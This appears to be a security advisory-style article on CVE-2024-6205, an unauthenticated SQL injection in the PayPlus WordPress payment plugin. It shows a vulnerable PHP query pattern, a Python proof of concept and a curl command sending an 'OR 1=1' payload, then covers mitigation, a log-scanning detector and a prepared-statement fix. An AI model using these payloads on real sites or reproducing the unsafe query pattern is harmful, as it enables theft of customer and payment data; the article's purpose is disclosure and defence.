CVE-2024-6205 - PayPlus Payment Gateway WordPress Plugin (v6.6.8 and below) SQL Injection Vulnerability Exploit and Mitigation Guide

In June 2024, a critical security issue, CVE-2024-6205, was disclosed in the PayPlus Payment Gateway WordPress plugin, affecting every site running version 6.6.8 or earlier. The plugin is commonly used with WooCommerce to accept online payments. The vulnerability exposes sites to unauthenticated SQL injection, potentially allowing attackers to read, modify, or destroy database contents without ever logging in.

Security researchers have published proof-of-concept exploits and the WordPress plugin repository has advised an urgent upgrade. In this article we break down how the vulnerability works, show exploit code (for educational awareness), and give you actionable steps to secure your site.

What does this mean?

The plugin exposes a REST API endpoint (meant for WooCommerce integrations) that accepts user input from the web without sanitizing it or binding it as a query parameter. Crafted input can therefore change the meaning of the SQL query the site runs, giving an unauthenticated caller access to data they should never see.

Technical Deep Dive & Exploit Example

Vulnerable PayPlus versions pass user-supplied data into SQL queries without sanitizing or parameterizing it. The endpoint path and code below are illustrative: they show the vulnerable pattern rather than the plugin's exact route and source. Suppose the plugin exposes an endpoint like:

POST /wp-json/payplus/v1/order/get

and expects a JSON body like

{
  "order_id": "1234"
}

but drops the parameter straight into a SQL query, as in

// Illustrative REST callback: $request is the WP_REST_Request for the call above.
$order_id = $request->get_param( 'order_id' ); // raw, untrusted value from the JSON body
$result   = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}orders WHERE id = '$order_id'" );

Because $order_id is never sanitized or bound as a parameter, an attacker can send a request like

{
  "order_id": "1234' OR 1=1 -- "
}

This would turn the SQL into

SELECT * FROM wp_orders WHERE id = '1234' OR 1=1 -- '

The injected quote closes the string literal, `OR 1=1` is always true, and `-- ` comments out the dangling quote, so the query returns every order and potentially exposes customer and payment data.

Exploit Proof of Concept (PoC)

> Note:
> This code is for educational use only. Never attack sites you don’t own or control.

import requests

# Illustrative target URL (the endpoint discussed above).
URL = "https://target.site/wp-json/payplus/v1/order/get"

# SQL injection payload: closes the quoted value, adds an always-true
# condition, and comments out the rest of the query.
malicious_order_id = "1' OR 1=1 -- "

json_data = {
    "order_id": malicious_order_id
}

# No cookies, nonce, or API key: the request is fully unauthenticated.
response = requests.post(URL, json=json_data, timeout=10)
print(response.status_code)
print(response.text)

Expected result:
If the site is vulnerable, the response contains every order, regardless of authentication. On a patched site the same request should no longer return other customers' orders.

Even simpler

You don't need any authentication tokens or logins to abuse this; it works straight from curl or similar tools. (The single quote inside the JSON body has to be escaped for the shell, hence the '\'' sequence.)

curl -X POST 'https://target.site/wp-json/payplus/v1/order/get' \
  -H 'Content-Type: application/json' \
  --data '{"order_id":"1'\'' OR 1=1 -- "}'

References & Research

- Original CVE Entry - CVE-2024-6205
- WPScan Vulnerability Advisory
- WordPress Plugin Repository (PayPlus)
- Patch Release Changelog

Mitigation Steps

1. Update the Plugin Immediately

- In the WordPress admin, go to Plugins and find PayPlus for WooCommerce
- Click Update Now (or download and install the new zip from the official repo) and confirm the installed version is 6.6.9 or later

2. Block Unauthenticated API Access

If possible, block unauthenticated access to the specific REST API endpoints exposed by plugins you use, especially payment gateways. Do this as a stopgap while you patch, not instead of patching. Be careful with blanket rules: payment gateways typically need at least one unauthenticated callback (the route the gateway itself calls to confirm a payment), so restrict by route and, where the gateway publishes them, by source addresses, and verify checkout still completes afterwards.

3. Monitor Logs

Check your server logs and database for suspicious API requests, especially if you cannot pinpoint when the patch was applied. Look for quotes, `OR 1=1`, `--`, or `UNION SELECT` in requests to /wp-json/ routes, for unusually large responses from a single endpoint, and for bursts of requests from one address. Keep in mind that standard access logs record the query string but not POST bodies, so injection sent in a JSON body (as in the PoC above) only shows up in WAF or application logs; on the database side, check for unexpected changes to users, orders, and options.
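The check described above, as an added example that is not part of the original article: a small scanner that flags SQL-injection indicators in combined-format access log entries for WordPress REST routes. The log lines are constructed for the demo and use the article's illustrative /wp-json/payplus/ path; adjust ROUTE_PREFIXES to the routes your plugins actually register.

```python
"""Added example, not from the original article: flag SQL-injection indicators
in web-server access log entries for WordPress REST routes. The log lines are
constructed for the demo and use the article's illustrative /wp-json/payplus/
path; adjust ROUTE_PREFIXES to the routes your plugins actually register."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed sample entries in combined log format. The first line is the
# PoC shape (payload in a POST body) and is invisible to a path-only scan.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Jul/2024:10:01:02 +0000] "POST /wp-json/payplus/v1/order/get HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"
203.0.113.7 - - [19/Jul/2024:10:01:05 +0000] "GET /wp-json/payplus/v1/order/get?order_id=1234%27%20OR%201%3D1%20--%20 HTTP/1.1" 200 48211 "-" "curl/8.4.0"
198.51.100.3 - - [19/Jul/2024:10:02:11 +0000] "GET /wp-json/wc/v3/products?per_page=10 HTTP/1.1" 200 3091 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Jul/2024:10:03:40 +0000] "GET /wp-json/payplus/v1/order/get?order_id=1%20UNION%20SELECT%201,2,3%20--%20 HTTP/1.1" 500 221 "-" "curl/8.4.0"
"""

# Combined log format: ip ident user [ts] "METHOD PATH PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Only REST routes are of interest here (assumed prefix; narrow it to your plugin's routes).
ROUTE_PREFIXES = ("/wp-json/",)

# Cheap indicators, applied after URL-decoding. Each is a (label, regex) pair.
SQLI_INDICATORS = [
    ("quote-tautology", re.compile(r"'\s*(or|and)\s+\S+\s*=\s*\S+", re.I)),   # ' OR 1=1
    ("comment-terminator", re.compile(r"(--|#)\s*$")),                        # trailing -- or #
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-log entry into fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def sqli_indicators(path: str) -> List[str]:
    """Return the labels of every indicator that fires on the URL-decoded request path."""
    decoded = unquote_plus(path)
    return [label for label, rx in SQLI_INDICATORS if rx.search(decoded)]


def scan(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per REST request whose path carries an SQLi indicator."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(ROUTE_PREFIXES):
            continue
        hits = sqli_indicators(rec["path"])
        if hits:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "status": rec["status"],
                "path": unquote_plus(rec["path"]),
                "indicators": hits,
            })
    return findings


def suspicious_ips(findings: List[Dict[str, object]]) -> List[str]:
    """Distinct source addresses across all findings, sorted for reporting."""
    return sorted({str(f["ip"]) for f in findings})


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['ip']} {f['status']} {f['path']} -> {', '.join(f['indicators'])}")
    print("suspicious sources:", suspicious_ips(results))
```

Run it against the sample and two of the four entries are flagged; the POST on the first line, which is exactly the shape the PoC sends, produces no finding because the body is not in the access log. That is the gap to close with WAF or application-level logging, and it is why a large response size on a route that should return one order (the 48211-byte GET here) deserves a look even when no indicator fires.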

4. Code Hygiene

If you manage custom plugins for WooCommerce, never build SQL by concatenating user input. Use WordPress $wpdb->prepare() for every dynamic query: %d for integers, %s for strings, %f for floats. Sanitizing alone is not enough; binding the value as a placeholder is what keeps it from being parsed as SQL.

Before

// UNSAFE!
$result = $wpdb->get_results("SELECT * FROM orders WHERE id = '$input'");

After

// SAFE: %d coerces the value to an integer, so a payload like "1234' OR 1=1 -- "
// collapses to a plain number and can never alter the structure of the query.
$result = $wpdb->get_results( $wpdb->prepare( "SELECT * FROM orders WHERE id = %d", $input ) );

Final Words

CVE-2024-6205 is a reminder that even trusted WordPress plugins can have serious flaws. Unauthenticated SQL injection is one of the most dangerous attacks against a web application because it needs no account and reaches the data directly. If you use PayPlus or other e-commerce plugins, update them promptly and keep monitoring your site's logs and database.

Have you found weird traffic on your logs, or seen unauthorized access to shop data? Let us know in the comments.

Resources

- Update Plugins
- WordPress Security Guide

Timeline

Published on: 07/19/2024 06:15:03 UTC
Last modified on: 08/01/2024 14:00:15 UTC